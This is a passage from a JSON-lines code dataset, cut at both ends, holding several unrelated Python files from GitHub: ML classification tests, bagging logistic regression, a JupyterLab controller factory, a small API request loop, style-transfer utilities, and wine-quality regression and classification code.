pd.DataFrame()\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()\n\ndef test_using_empty_test_df_fails():\n with pytest.raises(AssertionError):\n test_df = pd.DataFrame()\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()","repo_name":"blitzml/blitzml","sub_path":"test_blitzml_tabular_Classification.py","file_name":"test_blitzml_tabular_Classification.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"28979578455","text":"#基本分类器为逻辑回归,数据集:马疝病\n#ratio=0.8, bagnum=21 ,错误率0.31,0.32,0.26,...\n#ratio=1.0, bagnum=21 ,错误率0.26,0.23,0.28,...\n#原始的逻辑回归分类,错误率:0.35左右\nfrom numpy import *\n\ndef loadData(fileName):\n fr = open(fileName)\n numDimen = len(fr.readline().split(\"\\t\"))\n dataMatrix = []\n labelMatrix = []\n for line in fr.readlines():\n arrFea = []\n arrLine = line.strip().split(\"\\t\")\n for i in range(numDimen-1):\n arrFea.append(float(arrLine[i]))\n dataMatrix.append(arrFea)\n labelMatrix.append(float(arrLine[-1]))\n return dataMatrix,labelMatrix\n\ndef sigmoid(inx):\n return 1.0/(1+exp(-inx))\n\n#***改进的随机梯度上升法\n#随机遍历每个样本,更新参数;\n#循环多次遍历样本集\n#输入:训练数据dataMatrix,类别标签classLabels,默认迭代次数numIter\ndef sortGradientAscent(dataMatrix, classLabels, numIter):\n # print(\"dataMatrix\",dataMatrix)\n # print(\"classLabels\",classLabels)\n # m 训练样本个数 n 特征维数\n m,n = shape(dataMatrix)\n # 回归系数,1 x n行向量,n个特征对应n个回归系数 init 1\n weights= ones(n)\n # loop numIter times\n for j in range(numIter):\n # create index 0 ~ m-1\n dataIndex = range(m)\n # loop each sample\n for i in range(m):\n # update steps\n alpha = 4.0/(i+j+1.0)+0.01\n # choose an index\n randIndex = int(random.uniform(0,len(dataIndex)))\n # model predict value\n h = sigmoid(sum(dataMatrix[randIndex]*weights))\n # calculate predict error\n error = classLabels[randIndex] - h\n # update Regression confiction\n weights = weights + alpha * error * dataMatrix[randIndex]\n # delete sample which was used to update confiction\n delete(dataMatrix, randIndex)\n return weights\n\n#***分类函数\n#输入:待分类的数据inX,更新好的回归系数\ndef classifyVector(inx, weights):\n # use sigmoid function predict\n prob = sigmoid(sum(inx*weights))\n # if prob bigger than 0.5 classify to 1\n if prob > 0.5:\n return 1.0\n else:\n return 0.0\n\n# LR errorrate PRedict\ndef LRPredict(dataSet, classLabels, testData, testLabel):\n # calculate weights\n weights = sortGradientAscent(dataSet, classLabels, numIter=200)\n # count error number\n errorCount = 0\n for i in range(len(testData)):\n if int(classifyVector(testData[i,:], weights)) != testLabel[i]:\n errorCount += 1\n # calculate error rate\n errorRateLR = (float(errorCount)/len(testLabel))\n return errorRateLR\n\n#有放回的采样\n#dataSet:数据集(不含类别标签)\n#labels:类别标签\n#bagCapacity:每次有放回的抽取样本数\ndef baggingSample(dataSet, labels, bagCapacity):\n randIndex = []\n for i in range(bagCapacity):\n index = int(random.uniform(0, bagCapacity))\n randIndex.append(index)\n sampleData = dataSet[randIndex,:]\n sampleLabel = labels[randIndex]\n return sampleData,sampleLabel\n\n#bagging方法得到多个分类器,预测多个结果进行投票表决\ndef majorityCnt(labelList):\n # create dictionary the number of samples : classify\n items = dict([((labelList.count(i),i))for i in labelList])\n # return the samples of the most classify\n return items[max(items.keys())]\n\ndef baggingLRPredict(dataSet, labelList, testData, testLabel, sampleRatio, bagNum):\n bagCapacity = int(len(dataSet)*sampleRatio)\n numTest = len(testLabel)\n predictTestArr = zeros((numTest, bagNum))\n for i in range(bagNum):\n bagData,bagLabel = baggingSample(dataSet, labelList, bagCapacity)\n weights = sortGradientAscent(bagData, bagLabel, numIter=100)\n for j in range(numTest):\n predictTestArr[j,i] = int(classifyVector(testData[j,:], weights))\n errCount = 0\n for j in range(numTest):\n if majorityCnt(list(predictTestArr[j,:])) != testLabel[j]:\n errCount +=1\n errRate = float(errCount)/numTest\n return errRate,predictTestArr\n\n\nif __name__ == '__main__':\n dataSet,labelMatrix = loadData(\"/Users/scofield/MLRep/Data/horseColicTraining.txt\")\n testData,testLabel = loadData(\"/Users/scofield/MLRep/Data/horseColicTest.txt\")\n dataSet = array(dataSet)\n labelMatrix = array(labelMatrix)\n testData = array(testData)\n testLabel = array(testLabel)\n errorRateLR= []\n # for i in range(5):\n # errorRate = LRPredict(dataSet, labelMatrix, testData, testLabel)\n # errorRateLR.append(errorRate)\n # print(\"All error rate of LR classification is : \" , errorRate)\n # print(\"Average of LR classification : \" , sum(errorRate)/5)\n\n errorRateAll=[]\n for i in range(5):\n sampleRatio = 1.0\n bagNum = 21\n errorRate,pretestArr = baggingLRPredict(dataSet, labelMatrix, testData, testLabel, sampleRatio, bagNum)\n errorRateAll.append(errorRate)\n print(\"All error rate of LR classification is : \" , errorRate)\n print(\"Average of LR classification : \" , sum(errorRateAll)/5)","repo_name":"ScofieldShen/MLRep","sub_path":"ML/Bagging/Bagging_Classify.py","file_name":"Bagging_Classify.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12243756968","text":"\"\"\"Component factory and global and per-request context management.\"\"\"\n\nfrom __future__ import annotations\n\nfrom collections.abc import AsyncIterator\nfrom contextlib import aclosing, asynccontextmanager\nfrom dataclasses import dataclass\nfrom typing import Self\n\nimport structlog\nfrom httpx import AsyncClient\nfrom kubernetes_asyncio.client.api_client import ApiClient\nfrom safir.dependencies.http_client import http_client_dependency\nfrom safir.slack.webhook import SlackWebhookClient\nfrom structlog.stdlib import BoundLogger\n\nfrom .config import Config\nfrom .models.v1.prepuller_config import DockerSourceConfig, GARSourceConfig\nfrom .services.builder.fileserver import FileserverBuilder\nfrom .services.builder.lab import LabBuilder\nfrom .services.builder.prepuller import PrepullerBuilder\nfrom .services.fileserver import FileserverStateManager\nfrom .services.form import FormManager\nfrom .services.image import ImageService\nfrom .services.lab import LabManager\nfrom .services.prepuller import Prepuller\nfrom .services.size import SizeManager\nfrom .services.source.base import ImageSource\nfrom .services.source.docker import DockerImageSource\nfrom .services.source.gar import GARImageSource\nfrom .services.state import LabStateManager\nfrom .storage.docker import DockerStorageClient\nfrom .storage.gafaelfawr import GafaelfawrStorageClient\nfrom .storage.gar import GARStorageClient\nfrom .storage.kubernetes.fileserver import FileserverStorage\nfrom .storage.kubernetes.lab import LabStorage\nfrom .storage.kubernetes.node import NodeStorage\nfrom .storage.kubernetes.pod import PodStorage\nfrom .storage.metadata import MetadataStorage\n\n\n@dataclass(frozen=True, slots=True)\nclass ProcessContext:\n \"\"\"Per-process global application state.\n\n This object holds all of the per-process singletons and is managed by\n `~jupyterlabcontroller.dependencies.context.ContextDependency`. It is used\n by the `Factory` class as a source of dependencies to inject into created\n service and storage objects, and by the context dependency as a source of\n singletons that should also be exposed to route handlers via the request\n context.\n \"\"\"\n\n config: Config\n \"\"\"Lab controller configuration.\"\"\"\n\n http_client: AsyncClient\n \"\"\"Shared HTTP client.\"\"\"\n\n kubernetes_client: ApiClient\n \"\"\"Shared Kubernetes client.\"\"\"\n\n image_service: ImageService\n \"\"\"Image service.\"\"\"\n\n prepuller: Prepuller\n \"\"\"Prepuller.\"\"\"\n\n lab_state: LabStateManager\n \"\"\"State management for user lab pods.\"\"\"\n\n fileserver_state: FileserverStateManager\n \"\"\"State management for user fileservers.\"\"\"\n\n @classmethod\n async def from_config(cls, config: Config) -> Self:\n \"\"\"Create a new process context from the controller configuration.\n\n Parameters\n ----------\n config\n Lab controller configuration.\n\n Returns\n -------\n ProcessContext\n Shared context for a lab controller process.\n \"\"\"\n http_client = await http_client_dependency()\n kubernetes_client = ApiClient()\n\n # This logger is used only by process-global singletons. Everything\n # else will use a per-request logger that includes more context about\n # the request (such as the authenticated username).\n logger = structlog.get_logger(__name__)\n\n slack_client = None\n if config.slack_webhook:\n slack_client = SlackWebhookClient(\n config.slack_webhook, config.safir.name, logger\n )\n\n if isinstance(config.images.source, DockerSourceConfig):\n docker_client = DockerStorageClient(\n credentials_path=config.docker_secrets_path,\n http_client=http_client,\n logger=logger,\n )\n source: ImageSource = DockerImageSource(\n config=config.images.source,\n docker=docker_client,\n logger=logger,\n )\n elif isinstance(config.images.source, GARSourceConfig):\n gar_client = GARStorageClient(logger)\n source = GARImageSource(\n config=config.images.source, gar=gar_client, logger=logger\n )\n else:\n raise TypeError(\"Unknown prepuller configuration type\")\n\n metadata_storage = MetadataStorage(config.metadata_path)\n image_service = ImageService(\n config=config.images,\n source=source,\n node_storage=NodeStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n )\n size_manager = SizeManager(config.lab.sizes)\n lab_builder = LabBuilder(\n config=config.lab,\n size_manager=size_manager,\n instance_url=config.base_url,\n logger=logger,\n )\n fileserver_builder = FileserverBuilder(\n config=config.fileserver,\n instance_url=config.base_url,\n volumes=config.lab.volumes,\n logger=logger,\n )\n return cls(\n config=config,\n http_client=http_client,\n image_service=image_service,\n kubernetes_client=kubernetes_client,\n prepuller=Prepuller(\n image_service=image_service,\n prepuller_builder=PrepullerBuilder(\n metadata_storage=metadata_storage,\n pull_secret=config.lab.pull_secret,\n ),\n metadata_storage=metadata_storage,\n pod_storage=PodStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n ),\n lab_state=LabStateManager(\n config=config.lab,\n size_manager=size_manager,\n lab_builder=lab_builder,\n lab_storage=LabStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n ),\n fileserver_state=FileserverStateManager(\n config=config.fileserver,\n fileserver_builder=fileserver_builder,\n fileserver_storage=FileserverStorage(\n kubernetes_client, logger\n ),\n logger=logger,\n ),\n )\n\n async def aclose(self) -> None:\n \"\"\"Free allocated resources.\"\"\"\n await self.kubernetes_client.close()\n\n async def start(self) -> None:\n \"\"\"Start the background threads running.\"\"\"\n await self.image_service.start()\n await self.prepuller.start()\n await self.lab_state.start()\n if self.config.fileserver.enabled:\n await self.fileserver_state.start()\n\n async def stop(self) -> None:\n \"\"\"Clean up a process context.\n\n Called during shutdown, or before recreating the process context using\n a different configuration.\n \"\"\"\n if self.config.fileserver.enabled:\n await self.fileserver_state.stop()\n await self.prepuller.stop()\n await self.image_service.stop()\n await self.lab_state.stop()\n\n\nclass Factory:\n \"\"\"Build lab controller components.\n\n Uses the contents of a `ProcessContext` to construct the components of the\n application on demand.\n\n Parameters\n ----------\n context\n Shared process context.\n logger\n Logger to use for messages.\n \"\"\"\n\n @classmethod\n @asynccontextmanager\n async def standalone(cls, config: Config) -> AsyncIterator[Self]:\n \"\"\"Async context manager for lab controller components.\n\n Intended for background jobs or the test suite.\n\n Parameters\n ----------\n config\n Lab controller configuration\n\n Yields\n ------\n Factory\n Newly-created factory. Must be used as a context manager.\n \"\"\"\n logger = structlog.get_logger(__name__)\n context = await ProcessContext.from_config(config)\n factory = cls(context, logger)\n async with aclosing(factory):\n yield factory\n\n def __init__(self, context: ProcessContext, logger: BoundLogger) -> None:\n self._context = context\n self._logger = logger\n self._background_services_started = False\n\n @property\n def image_service(self) -> ImageService:\n \"\"\"Global image service, from the `ProcessContext`.\n\n Only used by tests; handlers have access to the image service via the\n request context.\n \"\"\"\n return self._context.image_service\n\n @property\n def lab_state(self) -> LabStateManager:\n \"\"\"Global lab state manager, from the `ProcessContext`.\n\n Only used by tests; handlers have access to the lab state manager via\n the request context.\n \"\"\"\n return self._context.lab_state\n\n @property\n def prepuller(self) -> Prepuller:\n \"\"\"Global prepuller, from the `ProcessContext`.\n\n Only used by tests; handlers don't need access to the prepuller.\n \"\"\"\n return self._context.prepuller\n\n async def aclose(self) -> None:\n \"\"\"Shut down the factory.\n\n After this method is called, the factory object is no longer valid and\n must not be used.\n \"\"\"\n if self._background_services_started:\n await self._context.stop()\n await self._context.aclose()\n\n def create_docker_storage(self) -> DockerStorageClient:\n \"\"\"Create a Docker storage client.\n\n Returns\n -------\n DockerStorageClient\n Newly-created Docker storage client.\n \"\"\"\n return DockerStorageClient(\n credentials_path=self._context.config.docker_secrets_path,\n http_client=self._context.http_client,\n logger=self._logger,\n )\n\n def create_form_manager(self) -> FormManager:\n \"\"\"Create service to generate lab spawning forms.\n\n Returns\n -------\n FormManager\n Newly-created form manager.\n \"\"\"\n return FormManager(\n image_service=self._context.image_service,\n lab_sizes=self._context.config.lab.sizes,\n logger=self._logger,\n )\n\n def create_gafaelfawr_client(self) -> GafaelfawrStorageClient:\n \"\"\"Create client to look up users in Gafaelfawr.\n\n Returns\n -------\n GafaelfawrStorageClient\n Newly-created Gafaelfawr client.\n \"\"\"\n return GafaelfawrStorageClient(\n config=self._context.config,\n http_client=self._context.http_client,\n logger=self._logger,\n )\n\n def create_lab_builder(self) -> LabBuilder:\n \"\"\"Create builder service for user labs.\n\n Returns\n -------\n LabBuilder\n Newly-created lab builder.\n \"\"\"\n return LabBuilder(\n config=self._context.config.lab,\n size_manager=self.create_size_manager(),\n instance_url=self._context.config.base_url,\n logger=self._logger,\n )\n\n def create_lab_manager(self) -> LabManager:\n \"\"\"Create service to manage user labs.\n\n Returns\n -------\n LabManager\n Newly-created lab manager.\n \"\"\"\n metadata_storage = MetadataStorage(self._context.config.metadata_path)\n return LabManager(\n instance_url=self._context.config.base_url,\n lab_state=self._context.lab_state,\n lab_builder=self.create_lab_builder(),\n image_service=self._context.image_service,\n size_manager=self.create_size_manager(),\n metadata_storage=metadata_storage,\n lab_storage=self.create_lab_storage(),\n lab_config=self._context.config.lab,\n slack_client=self.create_slack_client(),\n logger=self._logger,\n )\n\n def create_lab_storage(self) -> LabStorage:\n \"\"\"Create Kubernetes storage object for user labs.\n\n Returns\n -------\n LabStorage\n Newly-created lab storage.\n \"\"\"\n return LabStorage(self._context.kubernetes_client, self._logger)\n\n def create_size_manager(self) -> SizeManager:\n \"\"\"Create service to map between named sizes and resource amounts.\n\n Returns\n -------\n SizeManager\n Newly-created size manager.\n \"\"\"\n return SizeManager(self._context.config.lab.sizes)\n\n def create_slack_client(self) -> SlackWebhookClient | None:\n \"\"\"Create a client for sending messages to Slack.\n\n Returns\n -------\n SlackWebhookClient or None\n Configured Slack client if a Slack webhook was configured,\n otherwise `None`.\n \"\"\"\n if not self._context.config.slack_webhook:\n return None\n return SlackWebhookClient(\n self._context.config.slack_webhook,\n self._context.config.safir.name,\n self._logger,\n )\n\n def set_logger(self, logger: BoundLogger) -> None:\n \"\"\"Replace the internal logger.\n\n Used by the context dependency to update the logger for all\n newly-created components when it's rebound with additional context.\n\n Parameters\n ----------\n logger\n New logger.\n \"\"\"\n self._logger = logger\n\n async def start_background_services(self) -> None:\n \"\"\"Start global background services managed by the process context.\n\n These are normally started by the context dependency when running as a\n FastAPI app, but the test suite may want the background processes\n running while testing with only a factory.\n\n Only used by the test suite.\n \"\"\"\n await self._context.start()\n self._background_services_started = True\n","repo_name":"lsst-sqre/jupyterlab-controller","sub_path":"src/jupyterlabcontroller/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":13826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70388569130","text":"import requests\n\nurl = \"https://0ijq1i6sp1.execute-api.us-east-1.amazonaws.com/dev/stream\"\noutput_file = \"output.txt\"\n\nfor i in range(1000):\n response = requests.get(url)\n output = response.text.strip()\n \n with open(output_file, \"a\") as f:\n f.write(output + \"\\n\")\n\n","repo_name":"VaibhavRumale/Scripts","sub_path":"ramp.py","file_name":"ramp.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24046877034","text":"from PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport PIL \n\nimport importlib\nfrom scipy.optimize import fmin_l_bfgs_b\nfrom scipy.misc import imsave\nimport scipy.ndimage.filters\n\nfrom keras import metrics\nfrom vgg16_avg import VGG16_Avg\n\ndef img_resize(img):\n '''Resize the image to less than 500 x 500. \n Args:\n img: an actual image. \n ''' \n if (img.size[0]>500) or (img.size[1]>500):\n factor = (img.size[0]+img.size[1])/1000\n img = img.resize(np.divide(img.size, factor).astype('int32'))\n return img\n\n\ndef img_norm(img_arr):\n '''Normalize an image np array against imagenet mean and return as np array.\n Args:\n img_arr: a numpy array of an image.\n '''\n imagenet_mean = [123.68, 116.779, 103.939]\n rn_mean = np.array((imagenet_mean), dtype=np.float32) \n img_arr = (img_arr- rn_mean)[:, :, :, ::-1] # Flip the channels from RGB to BGR\n return img_arr\n\ndef load_image(size, path):\n '''Load image from disc and return as np array.\n Args:\n size: The desired dimensions of the output image.\n path: The full path of the image to load.\n '''\n width, height = size\n img = Image.open(path)\n img = img.resize((width, height))\n img_arr = np.array(img)\n img_arr = np.expand_dims(img_arr, 0)\n return img_arr\n\ndef get_content(size, content_path):\n '''Get content image from disc and return as a np array.\n Args:\n size: The desired dimensions of the output image.\n content_path: The full path of the content image to load.\n '''\n img_arr = load_image(size, content_path)\n img_arr = img_norm(img_arr)\n return img_arr\n\ndef load_tile_image(size, tilesize, path):\n '''Load image from disc and return the created tiled image as np array.\n Args:\n size: The desired dimensions of output image.\n tilesize: The desired dimensions of output unit tile image.\n path: The full path to the imag to load.\n '''\n width, height = size\n tile_width, tile_height = tilesize\n \n if (tile_width > width) or (tile_height > height):\n raise ValueError(\n 'Tile size needs to be smaller than the image size')\n img = Image.open(path)\n \n tile_img = img.resize((tile_width, tile_height)) \n tile_img = htile_style(img, int(width/tile_width))\n img = vtile_style(tile_img, int(height/tile_height))\n \n img = img.resize((width, height))\n img_arr = np.array(img)\n img_arr = np.expand_dims(img_arr, 0)\n return img_arr\n \ndef get_style_tile(size, tilesize, style_path):\n '''Get style image from disc and return the created tile image as np array\n Args: \n size: The desired dimensions of output image.\n tilesize: The desired dimensions of output unit tile image.\n style_path: The full path to the imag to load. \n '''\n style_arr = load_tile_image(size, tilesize, style_path)\n style_arr = img_norm(style_arr[:,:,:,:3])\n return style_arr\n\n\ndef get_style(size, style_path):\n '''Get style image from disc and return as a np array.\n Args:\n size: The desired dimensions of the output image.\n style_path: The full path of the style image to load.\n '''\n style_arr = load_image(size, style_path)\n style_arr = img_norm(style_arr[:,:,:,:3])\n return style_arr\n\ndef htile_style(style, num):\n '''Get style image and the number of tiles horizontally and return a new image object\n Args:\n style: the style image\n num: the desired number of tiles horizontally \n '''\n imgs = [style for i in range(num)]\n min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]\n imgs_comb = np.hstack( (np.asarray( i.resize(min_shape) ) for i in imgs ) )\n imgs_comb = PIL.Image.fromarray( imgs_comb)\n return imgs_comb\n\ndef vtile_style(style, num):\n '''Get style image and the number of tiles vertically and return a new image object\n Args:\n style: the style image\n num: the desired number of tiles vertically \n '''\n imgs = [style for i in range(num)]\n min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]\n imgs_comb = np.vstack( (np.asarray( i.resize(min_shape) ) for i in imgs ) )\n imgs_comb = PIL.Image.fromarray( imgs_comb)\n return imgs_comb\n\ndef deprocess(img_arr): \n '''Returns processed image back to normal as a np array \n Args:\n img_arr: a previously processed image np array \n '''\n rank = len(img_arr.shape)\n if (rank == 4):\n # Remove extra batch dimension\n img_arr = np.squeeze(img_arr, axis = 0)\n \n #flip the channels from BRG to RBG \n img_arr = img_arr[:, :, ::-1] \n \n # Remove zero-center by image mean pixel\n imagenet_mean = [123.68, 116.779, 103.939]\n rn_mean = np.array((imagenet_mean), dtype=np.float32) \n img_arr = img_arr + rn_mean \n img_arr = np.clip(img_arr, 0, 255).astype('uint8') # Clip for better quality image\n \n return img_arr\n\ndef plot_arr(img_arr):\n '''Plot a image with a processed image array\n Args:\n arr: a previously processed image np array\n ''' \n img_arr = deprocess(img_arr)\n plt.imshow(img_arr)\n return\n\nclass Evaluator(object):\n def __init__(self, f, shp): self.f, self.shp = f, shp\n\n def loss(self, x):\n loss_, self.grad_values = self.f([x.reshape(self.shp)])\n return loss_.astype(np.float64)\n\n def grads(self, x): return self.grad_values.flatten().astype(np.float64)\n\n","repo_name":"xxlatgh/fastaipart2","sub_path":"lesson1/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41052096988","text":"# -*- coding: utf-8 -*-\n# -*- author: jokker -*-\n\n# 参考 : https://www.liaoxuefeng.com/wiki/897692888725344/973805065315456\n\nfrom collections import namedtuple\n\n\"\"\"\n但是,看到(1, 2),很难看出这个tuple是用来表示一个坐标的。定义一个class又小题大做了,这时,namedtuple就派上了用场\n\"\"\"\n\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\n# 这个特性在很多的地方非常有用,在 出 xml 中的 table 的时候,都是用的字典来做,如果用一个这样的 tuple 会方便太多,这个思维非常不错\n\n\"\"\"\nnamedtuple是一个函数,它用来创建一个自定义的tuple对象,并且规定了tuple元素的个数,并可以用属性而不是索引来引用tuple的某个元素。\n这样一来,我们用namedtuple可以很方便地定义一种数据类型,它具备tuple的不变性,又可以根据属性来引用,使用十分方便。\n\"\"\"\n","repo_name":"newjokker/PyUtil","sub_path":"BuiltinModule/Collections/namedtuple.py","file_name":"namedtuple.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32392952017","text":"class node:\n def __init__(self,d):\n self.d=d\n r,l=None,None\n\nroot=None\ndef add(d):\n global root\n n=node(d)\n if root==None:\n root=n\n return\n a=root\n if d>root.d:\n b=a.r\n elif db.d:\n a,b=b,b.r\n elif da.d:\n a.r=n\n elif d3\ndef remove_rows_std_outlier(df,column):\n before_count=df[column].count()\n df.drop(df.index[abs(df[column]) > 3], inplace=True)\n after_count=df[column].count()\n count=before_count-after_count\n print('Removing ouliers in column : {}\\nNumber of outliers removed : {}'.format(column,count))\n\n#index_list=wine_s1[abs(wine_s1['fixed acidity']) > 3].index\n#wine.drop(wine.index[index_list])\n\nfor column in wine_s1.columns:\n if column != 'quality' :\n remove_rows_std_outlier(wine_s1,column)\n \n\nwine_s1.drop('quality',axis=1,inplace=True) \nsns.boxplot(data=wine_s1).set_title(\"After removing outliers\")\n\n#######################################################################################\n\n#--------- Linear Regression using OLS ---------------\n\n # --- Preparing the Data For linear Regression ------------\ndef remove_rows_outlier(df,column):\n df_col_mean=df[column].mean()\n df_col_std=df[column].std()\n df.drop(df.index[abs((df[column] - df_col_mean) / df_col_std) > 3], inplace=True)\n \nwine_noout=wine.copy()\nfor column in wine_noout.columns:\n if column != 'quality' :\n remove_rows_outlier(wine_noout,column)\n\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\n\nwine_X.columns\n # --- Splitting the Data For Training and Testing ------------\n \nX_train, X_test, y_train, y_test = train_test_split(wine_X,wine_y, test_size=0.3, random_state=999)\nX_train=stm.add_constant(X_train)\nX_test=stm.add_constant(X_test)\n\n\n#---------- Backward Feature Elimination after setting significance level at 0.05 ----------------\n\ndef remove_maxpvalcol(drop_col,X_train,X_test): \n X_train.drop([drop_col],axis=1,inplace=True)\n X_test.drop([drop_col],axis=1,inplace=True)\ni=0\nwhile True: \n OLS = stm.OLS(y_train,X_train)\n OLSR = OLS.fit()\n OLSR_pval_max=OLSR.pvalues.max()\n i+=1\n if OLSR_pval_max > 0.05:\n drop_col=OLSR.pvalues[OLSR.pvalues==OLSR_pval_max].index[0]\n print('For iteration no : {} \\n the max pval is for {} column and the value is {}'.format(i,drop_col,OLSR_pval_max))\n print('Dropping column : {}'.format(drop_col)) \n remove_maxpvalcol(drop_col,X_train,X_test)\n else:\n print('all the pvalues for the selected explanatory set is <0.05')\n break\n\nprint(OLSR.summary())\n\ny_pred = OLSR.predict(X_test)\ny_train_pred = OLSR.predict(X_train)\n\n\n#------------------- Metrics related to OLSR ------------\n\nplt.title('Comparison of Y values in test and the Predicted values')\nplt.ylabel('Test Set')\nplt.xlabel('Predicted values')\nplt.scatter(y_test,y_pred, marker ='+')\n\nprint('MAE:', metrics.mean_absolute_error(y_test, y_pred))\nprint('MSE:', metrics.mean_squared_error(y_test, y_pred))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\nprint('R2 :' , r2_score(y_test,y_pred))\nprint(OLSR.rsquared)\n\n\n\n\n#sns.pairplot(,x_vars=['fixed acidity', 'residual sugar', 'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'pH', 'sulphates','alcohol'], y_vars='density', size=7, aspect=0.7, kind='reg')\n\n######################################################################################\n\n\n# ---------------------- prepare and run k-fold for Linear Regression --------\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\n\n# - Backward Feature Elimination on entire dataset.\nwine_X =stm.add_constant(wine_X)\ni=0\nwhile True: \n OLS = stm.OLS(wine_y,wine_X)\n OLSR = OLS.fit()\n OLSR_pval_max=OLSR.pvalues.max()\n i+=1\n if OLSR_pval_max > 0.05:\n drop_col=OLSR.pvalues[OLSR.pvalues==OLSR_pval_max].index[0]\n print('For iteration no : {} \\n the max pval is for {} column and the value is {}'.format(i,drop_col,OLSR_pval_max))\n print('Dropping column : {}'.format(drop_col)) \n wine_X.drop([drop_col],axis=1,inplace=True)\n else:\n print('all the pvalues for the selected explanatory set is <0.05')\n break\n \nOLSR.rsquared\n\n# Training and validating using Kfold where n=10\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=10,random_state=9, shuffle=False)\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\nwine_X =stm.add_constant(wine_X)\nr2_tot=0\nrsquared_total,n=0,1\nfor train_index, test_index in kf.split(wine_X):\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n OLS = stm.OLS(y_train,X_train)\n OLSR = OLS.fit()\n y_pred = OLSR.predict(X_test)\n rsquared=OLSR.rsquared\n rsquared_total+=rsquared\n rsquared_mean=rsquared_total/n\n r2=r2_score(y_test,y_pred)\n print(\"Kfold# = {} \\t R-Squared = {} \\t R-Squared-mean ={} \\t Trained_r2 = {}\".format(n,rsquared,rsquared_mean,r2))\n r2_tot+=r2 \n r2_mean=r2_tot/n\n n+=1\n \nprint(r2_mean) \nprint(OLSR.summary())\n\n\n########################################################################################\n\n# Prepare for Classification Modeling.\n#removing free Sulphur dioxide as it looks to have a similar effect as TotalSulphurDioxide.\n\nwine_clean=wine_noout.copy()\nwine_clean.drop(['free sulfur dioxide'],axis=1,inplace=True)\n\nlevel_Rating_3 = []\nfor i in wine_clean['quality']:\n if i >= 1 and i <= 3:\n level_Rating_3.append('1')\n elif i >= 4 and i <= 7:\n level_Rating_3.append('2')\n elif i >= 8 and i <= 10:\n level_Rating_3.append('3')\nwine_clean['LR3'] = level_Rating_3\n\nwine_X= wine_clean.drop(['quality','LR3'],axis=1)\nwine_y=wine_clean['LR3']\n \nX_train, X_test, y_train, y_test = train_test_split(wine_X, wine_y, random_state = 0)\nfrom sklearn.linear_model import LogisticRegression\ndef LRfit():\n lr = LogisticRegression()\n lr.fit(X_train, y_train)\n lr.decision_function(X_train)\n global y_pred\n y_pred = lr.predict(X_test)\n\nLRfit()\n\n#create confusion matrix and return accuracy score\ndef scores(y_test, y_pred):\n print(\"Confusion Matrix : \\n\",confusion_matrix(y_test, y_pred))\n print('Accuracy = {}'.format(accuracy_score(y_test, y_pred)*100))\n print('precision = {}'.format(precision_score(y_test, y_pred,average=None)))\n print('sensitivity = {}'.format(recall_score(y_test, y_pred,average=None)))\n print(classification_report(y_test,y_pred))\nscores(y_test, y_pred) \n\n######################################################################################\n\n# prepare and run k-fold for Classification\n\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=5,random_state=9, shuffle=False)\ntotal_accuracy,n=0,0\nfor train_index, test_index in kf.split(wine_X):\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n LRfit()\n total_accuracy+=accuracy_score(y_test, y_pred)\n n+=1\n MAC=total_accuracy/n\n print(total_accuracy , MAC)\n \n\n\n######################################################################################## \n\n#----------- Decision Tree Classifier and K-Fold Implementation ---------------\nwine_X= wine_clean.drop(['quality','LR3'],axis=1)\nwine_y=wine_clean['LR3']\n \nX_train, X_test, y_train, y_test = train_test_split(wine_X, wine_y, random_state = 0)\n\nfrom sklearn.tree import DecisionTreeClassifier\ndef DTCfit():\n global dtc_gini\n dtc_gini = DecisionTreeClassifier(criterion='gini', max_depth=3, random_state=9, splitter='best')\n dtc_gini.fit(X_train,y_train)\n global y_pred\n y_pred = dtc_gini.predict(X_test)\nDTCfit(); \n#print confusion matrix and accuracy score\nprint(accuracy_score(y_test, y_pred))\nsns.scatterplot(X_test, y_pred, color = 'blue')\n#prepare k-fold \n\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=10,random_state=9, shuffle=False)\ntotal_accuracy,n=0,0\nfor train_index, test_index in kf.split(wine_X):\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n 